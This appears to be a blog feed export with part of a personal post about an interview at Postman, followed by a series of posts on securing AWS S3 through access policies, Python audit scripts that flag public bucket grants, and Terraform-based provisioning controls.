But this was just superficial. The real fun was when I had this discussion with a young gentleman who looked to be in his late 20s, or so I thought, until he broke it to me (and which anyone would otherwise also guess after speaking to him for some time) that he had been working in IT since the late 90s or so and had been a part of some great products of their time. And maybe I have not spoken to that many co-founders, but I have hardly seen any who are so transparent in their discussions about a lot of stuff (their company, your candidature etc.), and even fewer have I seen sharing their pretty insightful professional experiences with you on a first meeting. Ok, now there were a lot of instances where I was in disagreement with his views or ideology, but worth appreciating was that although he was strong about his points, he wasn’t obnoxiously arrogant about them and was instead quite open and humble in discussing them, which to me justified his maturity.

Of the many things we discussed, the ones that fascinated me were around how and why POSTMAN grew from a few hundred to now over a million developers. Why POSTMAN was not just a make-do product, but one that had a solid ideology behind its engineering designs. How exactly the engineers were die hard geeks at what they did and why they were happy doing it. And all of this was accompanied by examples, often more than one, which you could actually see in their product or their work culture. Why ‘flat hierarchy’ and ‘management transparency’ were not just 1337 speak (or so some would believe) but rather stuff you could see in front of you and relate to. What the challenges were that POSTMAN was aiming at next and what scale meant to them. And I am sure, even if some of us might have had the above talk sometime, with someone, this one is hard to beat. It was my first time being taken around that house (which some would prefer calling an office; not me, and also not the POSTMANs, I am sure), introduced to the engineers, and finally even taking a peek (officially, no shoulder surfing or any of those stunts) at their systems, what they were designing, what they were currently working on, what they had in the box for me, what the roadmap ahead was etc. I mean, that’s like what happens after you join a company, right ? It was amazing. It was a nice feeling to realize that I was considered for the offered position @POSTMAN. And that reminds me, even before this entire Cooper episode and the picture above was laid out, there were 3 rounds of talks (technical and otherwise) that I had with the co-founders and engineers @POSTMAN on different occasions, laid over a period of a week or so. The discussions were mostly around what they were looking for architecturally in a potential candidate, and questions which were, I guess, primarily to measure the technical acumen of the candidate.
I have had better technical questions asked on other occasions though, but this still was nice in the sense that it sort of portrayed where they were facing difficulties and how they were planning on addressing them.

Things were all in place except for a few things that I spoke about where we were in disagreement. And although I felt that I could fill in the gap @POSTMAN, and so did they feel that they could match my aspirations or vice-versa, guess this is a skill I am yet to master (and it’s a hard one to): you have to make tough decisions in life. And you don’t mostly get the best of both worlds. Compromises and shortcomings are meant to be made and accepted. And so I slept over the discussion, with the ball in my court, and the next morning spoke to the same guy (who only looked to be in his late 20s, but actually was a C-level employee @POSTMAN), expressing how hard it was to let go of the offer I had been made by POSTMAN at that point in time, due to a few, but strong enough, points that made me take that decision. Later that same day, I went through the LinkedIn profiles of some of the team I had met in person @POSTMAN, and I was not surprised that the decision I had to make was actually hard. Those guys were among the ones you would always want to learn from. Sheer brilliance. And not that I regret giving it up, but I am glad I did polish that skill I have been trying to master.

]]>
<![CDATA[Proactively Secure AWS S3]]>http://localhost:2368/proactively-secure-aws-s3/5e3fbdb0b9fad24fb2610116Sun, 09 Feb 2020 11:21:03 GMTIn the previous blogpost we explored the status of our AWS S3 by doing audits around it. We spoke to many of our key stakeholders, including the devs & the systems teams, to understand how we could fit S3 security into the context of our specific organization. While the audits are an essential (& absolutely mandatory) exercise towards our goal, they are not really scalable. They help with the clean up task, but don't really ensure that more mess is not being dumped on. Hence, it becomes crucial to figure out ways to proactively ensure that any new S3 resource creation follows a certain baseline/benchmark. So with that prelude, let's explore this section with a similar approach to the last one.

What

Have a system in place to ensure that any new S3 resources getting created follow a certain security benchmark.

Why

To ensure that new S3 resource creations are secure by default as per our contextual definition of security. This consequently leads to getting the problem of insecure S3 sorted at the root.

How

From the results of the last section we can infer that there are some very specific needs of our devs around AWS S3 requirements. More often than not, a very loosely access controlled S3 resource is not really needed. In the process of the audits, we also made certain rules around buckets, their access & their names. So to have proactive measures implemented, we would define our controls first as a set of rules/policies & then build tooling or systems to facilitate easier adoption &/or enforcement of these policies. And as last time, we would need measurable criteria to verify whether we have achieved what we wanted to or not, which gets us to our milestones listed below.

Milestones

  • [ ] A policy document detailing the rules that would define what is considered secure in the context of our organization
  • [ ] A system that implements/enforces this policy document
  • [ ] Number of violations of the above rules reported in the audits on newly created resources after the proactive system/s are implemented

We had already created a list of rules in the previous blogpost. In addition to those, let us say that there are a couple more use cases that were identified over a period of time. So our extended set of rules/policies now becomes:

  1. Only & only the following 3 operations would be allowed onto any newly created bucket: s3:GetObject, s3:PutObject and s3:DeleteObject
  2. There would be one IAM user for every single bucket who would be allowed the above 3 access permissions onto that bucket & that bucket alone.
  3. Cross account S3 access would not be allowed
  4. Every bucket will have a subfolder that would allow any objects inside it to be world/public readable
  5. All S3 resources would be created only with the provisioned system to do so

Now once again, the above is a very contextual set of rules & policies that depends on each organization. It still makes for a good example.
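Expressed as code, rules 1–4 above can double as a pre-flight check that runs before any bucket request reaches the provisioning system. The sketch below is purely illustrative: the function, the shape of the request dict & the field names are all my own assumptions, not part of any existing tooling. (Rule 5 is a process control rather than a code check.)

```python
# Hypothetical pre-flight validator for a bucket creation request,
# encoding rules 1-4 above. All names/fields are illustrative assumptions.

ALLOWED_ACTIONS = {"s3:GetObject", "s3:PutObject", "s3:DeleteObject"}

def validate_request(request, our_account_id):
    """Return a list of policy violations for a bucket creation request.

    `request` is a dict like:
      {"bucket": "my-bucket",
       "actions": ["s3:GetObject", ...],    # rule 1
       "iam_user": "my-bucket-user",        # rule 2: one dedicated user per bucket
       "principal_account": "123456789012", # rule 3: no cross-account access
       "public_folder": "public/"}          # rule 4: one world-readable prefix
    """
    violations = []
    if not set(request.get("actions", [])) <= ALLOWED_ACTIONS:
        violations.append("rule 1: only Get/Put/DeleteObject are allowed")
    if not request.get("iam_user"):
        violations.append("rule 2: a dedicated IAM user is required")
    if request.get("principal_account") != our_account_id:
        violations.append("rule 3: cross-account access is not allowed")
    if not request.get("public_folder"):
        violations.append("rule 4: a public subfolder must be declared")
    return violations
```

An empty list means the request conforms & can be handed on to the actual provisioning step.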

The second bit is to think about a system that would technically implement the above policies. One of the ways to do so would be to use Terraform. The details of what it is & how it can be set up & used are quite decently documented in the above link. For our use case, we would make use of the below Terraform script to ensure that any new bucket creation abides by all the rules/policies we identified above.

c0n71nu3/s3ProactiveSecure
Terraform for securing AWS S3 proactively (opinionated) - c0n71nu3/s3ProactiveSecure

Having the Terraform script solves our requirement to a large extent.

The next question that arises, however, is how/who would run this script? This aspect has to be controlled. Giving it away to anyone & everyone would again land us in a bad state. One of the ways to do this could be to have another layer between the Terraform script (version controlled), which actually makes the infra changes, and the users who need these S3 buckets.
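In essence, that in-between layer is just strict input validation plus a controlled invocation of the version-controlled script. A minimal sketch of what it might look like, assuming the Terraform script accepts `bucket_name` & `public_folder` variables (those variable names, & everything else here except the Terraform CLI flags, are my own assumptions):

```python
import re
import subprocess

# Simplified version of the S3 bucket naming rules
BUCKET_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9.-]{1,61}[a-z0-9]$")

def build_terraform_cmd(bucket, public_folder):
    """Validate user input & build the terraform command the layer would run.

    Users never see credentials or the script itself; they only supply these
    two values, which are passed through as Terraform variables.
    """
    if not BUCKET_NAME_RE.match(bucket):
        raise ValueError(f"invalid bucket name: {bucket!r}")
    return [
        "terraform", "apply", "-auto-approve",
        f"-var=bucket_name={bucket}",
        f"-var=public_folder={public_folder}",
    ]

def create_bucket(bucket, public_folder="public"):
    # In a real system, first record (user, bucket, timestamp) in a
    # tamper-proof audit trail, then run from the checked-out script's dir.
    subprocess.run(build_terraform_cmd(bucket, public_folder), check=True)
```

The validation step is what keeps arbitrary input from ever reaching the infra credentials.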

Pros of this approach

  1. The Terraform script itself would be version controlled & source maintained (with all the respective checks & controls around that system). This means that the credentials to access the underlying infra do not need to be given out to any users at all. It also ensures that only the approved rules, mentioned in the script, are used for actual resource creation. Plus, being version controlled packs in the inherent benefit of audit capabilities.
  2. This additional layer would be the one that the user would finally interface with. Hence, all the details of the underlying Terraform can be abstracted out, thus making it very simple for any developers to create an S3 bucket.

Cons of this approach

It becomes extremely crucial that this additional layer be very tightly controlled, especially in a situation where this system may become a solution for provisioning other infra related resources as well. It needs to have its own tamper-proof, securely maintained audit trails recording which resource creation was triggered by which user.

There could possibly be many other approaches to achieve the proactive controls depending on your specific context again.

One such system that readily provides exactly this capability is this awesome tool from GoJek:

gojek/proctor
A Developer-Friendly Automation Orchestrator. Contribute to gojek/proctor development by creating an account on GitHub.

When the Terraform script mentioned above is used with this tool, what it provides (from our use case's perspective) is a command to the user of the form:

proctor execute create-s3-bucket --name=myBucket --public=myCustomPublicFolder

and produces as output the same thing as mentioned in my GitHub link above.

Once the above systems are provisioned & made available to the users, the last bit that remains is to ensure that devs (or most users in general) create any S3 resources only through the above system. This would be more of a process driven thing again, which may include removal of, say, AWS console access/capabilities of any/all users. Once again this is quite contextual depending on how things are being managed at a given organization.

With all of this we are assured that any new bucket creations would be as per our defined policies (& technically enforced for the most part). There may be exceptions at times, which would need to be accommodated on an on-demand basis (& perhaps eventually generalized & made a part of the above/another system if needed). Our audits, from the last blog post, are already set up to run as a cron. And using that we can track whether the proactive approach we discussed above has actually led to any improvements in the creation of S3 resources.

Revisiting our milestones:

[✔︎] A policy document detailing the rules that would define what is considered secure in the context of our organization
[✔︎] A system that implements/enforces this policy document
[✔︎] Number of violations of the above rules reported in the audits on newly created resources after the proactive system/s are implemented

Revisiting our Objective 1: Secure AWS S3 plan:

[✔︎] Audit & ensure that the existing open buckets/objects fixed/accounted for
[✔︎] Ensure that any new buckets/objects being created are secure
[ ] Ensure that the security team is made aware of any insecure buckets/objects existence/creation (if at all) as quickly as possible


Credits:

  • @vjdhama for guidance around Terraform
]]>
<![CDATA[Audit AWS S3]]>http://localhost:2368/audit-aws-s3/5e3e578704b19e5725a51317Sat, 08 Feb 2020 06:46:57 GMTWhat

Go through all the existing S3 buckets & objects in the AWS infra & check to see how many & which of those are publicly accessible & why.

Why

  • We need to get a picture of the current state of S3 in our infrastructure. This would help us assess what & how much work needs to be done
  • It would help us keep a track of our progress
  • This essentially defines our benchmark

How

There's a possibility that this is the first time that the S3 resource is going to be used in our AWS infra, in which case, the effects of audits may not be immediately visible. Nevertheless, audits still make sense as the usage of S3, in our infra, expands.

In the other case, where AWS S3 is already being used in the infra, this could easily become one of the most time-taking (& resource-consuming) tasks. We could choose to do this manually, by logging into the AWS console every day & doing the audit by hand, or, with the power of programming/scripting (especially in Python) bestowed upon us, we could choose to automate the audits. (I am not a big fan of the former approach personally, at all!)

Milestones

  • [ ] get a list of all existing buckets/objects, their existing access permissions & possibly their owners & reasons for why these buckets/objects are public
  • [ ] get a count of buckets/objects that are publicly accessible
  • [ ] have a script ensuring that this list is regularly updated & maintained

As mentioned earlier, one way of doing the above is to go to the AWS console & look for these buckets & their permissions & maintain a record of the same manually. However, I prefer automation wherever possible (& sensible). There are plenty of open source scripts/tools that let you do these kinds of audits. A simple Google search would give enough good results, like:

scalefactory/s3audit
CLI tool for auditing S3 buckets. Contribute to scalefactory/s3audit development by creating an account on GitHub.
SecOps-Institute/AWS-S3-Buckets-Audit-Users
Ever tried to summarise the User access to the S3 buckets in your AWS Account? Here is the tool that can help you do the same - SecOps-Institute/AWS-S3-Buckets-Audit-Users
richarvey/s3-permission-checker
Check read, write permissions on S3 buckets in your account - richarvey/s3-permission-checker

etc. All of the above are good tools that can be used to get S3 audits in place.

The above tools help us achieve all the milestones identified above, except the part that mentions "possibly their owners & reasons for why these buckets/objects are public". This is a manual thing that needs to be done, unless there's already enough tooling in the existing infra that maintains this record.
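At their core, audits like these walk the account's bucket list & flag ACL grants made to S3's predefined "AllUsers" / "AuthenticatedUsers" groups. A minimal boto3 sketch of that loop, assuming AWS credentials are already configured in the environment (the function names are my own, & a complete audit would also have to cover bucket policies & object-level ACLs, which the tools above handle more thoroughly):

```python
# The two predefined grantee groups that make a grant "public"
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

def public_grants(acl):
    """Given a get_bucket_acl() response dict, return the grants that expose
    the bucket to everyone (or to any authenticated AWS account)."""
    return [
        g for g in acl.get("Grants", [])
        if g.get("Grantee", {}).get("URI") in PUBLIC_GROUPS
    ]

def audit_buckets():
    """Yield (bucket_name, public_grants) pairs for every bucket in the account."""
    import boto3  # deferred so the pure helper above is usable without AWS access
    s3 = boto3.client("s3")
    for bucket in s3.list_buckets()["Buckets"]:
        yield bucket["Name"], public_grants(s3.get_bucket_acl(Bucket=bucket["Name"]))
```

Dumping the non-empty results of `audit_buckets()` to a file on a cron gives the regularly updated list our third milestone asks for.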

However, once we have captured & analyzed the above data, we are in a position to determine what exactly the requirements of our developers are, why they need buckets/objects with a certain access & which of the buckets/objects can/should remain with lenient access controls. Consequently, this allows for more informed decisions on what may be called insecure in the context of our developers'/our org's requirements, instead of a one-size-fits-all approach. It helps us decide the strategy that would best suit the custom needs of our devs while ensuring security around anything (S3 in this case).

For example, in our use case, after doing the above exercise & extended discussions with our devops/systems team & enough devs, we settled on the below strategy for managing access around our S3:

  1. Only & only the following 3 operations should be allowed onto any bucket: s3:GetObject, s3:PutObject and s3:DeleteObject
  2. There should be one IAM user for every single bucket who would be allowed the above 3 access permissions onto that bucket & that bucket alone. A naming convention was also made ensuring that all such IAM user names end with -s3 so we could easily identify these users as & when needed
  3. All of these users must belong to the only one AWS account that we use, or in other words, no cross account access allowed

Any buckets that do not follow the above criteria would be considered insecure.

Now the above example is a very opinionated conclusion based on our specific requirements. This could be anything else in your case.
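The rules above lend themselves directly to code; the sketch below shows how an audit could classify one bucket against rules 1–3 (all names here are illustrative, not the actual audit script):

```python
# Rule 1: the only operations ever allowed on a bucket
ALLOWED_ACTIONS = {"s3:GetObject", "s3:PutObject", "s3:DeleteObject"}

def actions_ok(actions):
    """Rule 1: the policy grants nothing beyond Get/Put/DeleteObject."""
    if isinstance(actions, str):  # policy JSON allows a bare string or a list
        actions = [actions]
    return set(actions) <= ALLOWED_ACTIONS

def user_name_ok(iam_user_name):
    """Rule 2's naming convention: dedicated bucket users end with -s3."""
    return iam_user_name.endswith("-s3")

def is_secure(actions, iam_user_name, account_id, our_account_id):
    """Apply rules 1-3 to one audited bucket; True means 'considered secure'."""
    return (actions_ok(actions)
            and user_name_ok(iam_user_name)
            and account_id == our_account_id)  # rule 3: no cross-account access
```

Anything that comes back `False` lands on the "insecure, needs fixing" list from the audit.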

So, to suit our specific audit needs, we came up with a custom audit script, which can be found here:

c0n71nu3/s3Auditor
Contribute to c0n71nu3/s3Auditor development by creating an account on GitHub.

After the results of the above audit are available, the next step is to start working on the data by getting the bucket/object access fixed wherever identified as necessary. This may again be quite a manual task (& a mammoth one in our case), depending on how the processes are defined in your org, as it may need context, permissions, execution capabilities/bandwidth etc. to get these fixed. Once all the identified issues are fixed, we would have reached a clean slate. The audits would still need to be run periodically though, to ensure that the security team is on top of things should anything come up again after the audits, or to keep a track of the progress around the clean up itself.

The number of buckets still existing with unacceptable access gives a great deal of clarity on whether efforts are being invested in the right direction or not. Managers/leadership, please smile :)

Revisiting our milestones:

  • [✔︎] get a list of all existing buckets/objects, their existing access permissions & possibly their owners & reasons for why these buckets/objects are public
  • [✔︎] get a count of buckets/objects that are publicly accessible
  • [✔︎] have a script ensuring that this list is regularly updated & maintained

Revisiting our Objective 1: Secure AWS S3 plan:

[✔︎] Audit & ensure that the existing open buckets/objects fixed/accounted for
[ ] Ensure that any new buckets/objects being created are secure
[ ] Ensure that the security team is made aware of any insecure buckets/objects existence/creation (if at all) as quickly as possible

]]>
<![CDATA[Objective 1: Secure AWS S3]]>http://localhost:2368/objective-1-secure-aws-s3/5e369ea804b19e5725a512b1Sun, 02 Feb 2020 10:05:33 GMTWhat is AWS S3?

Very simply put, it is a service offered by AWS that can be used as storage (called buckets) for different types of files.

So what does it mean to secure AWS S3?

It could mean n number of things. One of those things is to ensure that the buckets & their contents (objects) are access controlled, & we'll focus on this aspect.

(Others could include things like ensuring that the bucket & its contents are protected against data loss, S3 objects are encrypted at rest, there's logging enabled for the buckets etc. We would not talk about these or any others in this case. Also, AWS by default has options to ensure public access around S3 is taken care of, like disabling public access at the account level itself. We would not talk about this either, as it may not always be feasible for every org/use case, like it wasn't in ours.)

Key result: No open/public buckets/objects

We need a measurable key result to ensure that we have been able to achieve our objective. We define our key result as a measure of the number of AWS S3 buckets, or any content/s within them, that are publicly accessible. So ideally, if we could set zero open/public buckets/objects as our criterion for saying that we have achieved our objective, nothing like it.

But of course there could be reasons for certain buckets or objects (contents of a bucket) to be publicly accessible, depending on the business context, which always is/should be the highest priority. Hence our actual key result, to accommodate for the above, becomes:

  • No open/public buckets/objects,
  • at least not without prior approval from the security team or the information of the security team.
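Since the key result is a number, it can be computed mechanically from audit output; a tiny sketch (the function & input names are assumptions, not part of any existing tooling):

```python
def key_result(public_buckets, approved_exceptions):
    """Count of buckets that are public WITHOUT the security team's sign-off.

    `public_buckets` comes from the audit; `approved_exceptions` is the
    security team's list of business-justified public buckets.
    The objective is met when this number is (and stays) zero.
    """
    return len(set(public_buckets) - set(approved_exceptions))
```

Tracking this single number over time is what lets us say, objectively, whether we are getting closer to the objective or drifting away from it.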

Plan

Below would be our plan to reach our key result/s & finally achieve our objective too.

  1. Audit & ensure that the existing open buckets/objects fixed/accounted for
  2. Ensure that any new buckets/objects being created are secure
  3. Ensure that the security team is made aware of any insecure buckets/objects existence/creation (if at all) as quickly as possible
]]>
<![CDATA[Securing Your Cloud Infra]]>http://localhost:2368/securing-cloudinfra-intro/5e344fc8cd85244165d16facFri, 31 Jan 2020 16:03:29 GMTSo this blogpost has been sitting in my drafts for indeed a very long time. And I am definitely late to the party, but hopefully the write up is still of some help to someone.

Securing any cloud environment, for that matter, is a vast topic & it would be difficult to cover it all in one single blogpost. Hence, I would try to break it down as per a generic approach that I usually take when trying to think of solutions around any given problem. Also, we would try to have the blogpost designed with 2 things in mind:

  • we would approach it one step at a time
  • we would try to keep our solutions as unblocking as possible for our devs

A few things that I have learnt, sort of the hard way (& I am very grateful for this learning), are:

  1. to identify the actual root cause of the problem
  2. to measure what matters  (excellent read IMHO)
  3. collaborate (wherever & whenever possible) with devs & systems teams. It makes a security engineer's job a breeze & solutions worthwhile !

For this post we would not focus on identification of the root cause of the problem, since this post is directed towards securing your cloud infra & of course because I would like to keep this post more technical than philosophical. We would assume that we have a problem statement at hand that needs to be solved.

For this post and (hopefully) a few follow up ones, we would focus on securing AWS, one step at a time. AWS itself has plenty of resources & securing AWS essentially means securing each of these resources, of course depending on which of them you are actually using. It does not make a lot of sense to try securing S3, for example, if you're not really using it at all.

Problem statement: Secure AWS infrastructure

If we want to solve the above problem, we would break up the problem into smaller sub problems/objectives.

Objectives:

  1. Secure AWS S3
  2. Secure Ec2 instances
  3. Secure IAM
  4. Secure EKS

The above is a very limited list. But for now, let us focus on them alone and one at a time.


Credits:

  • @makash for the constant motivation
  • @amolnaik4 for guidance around thought process
  • @AjeyGore for introduction to measure what matters
]]>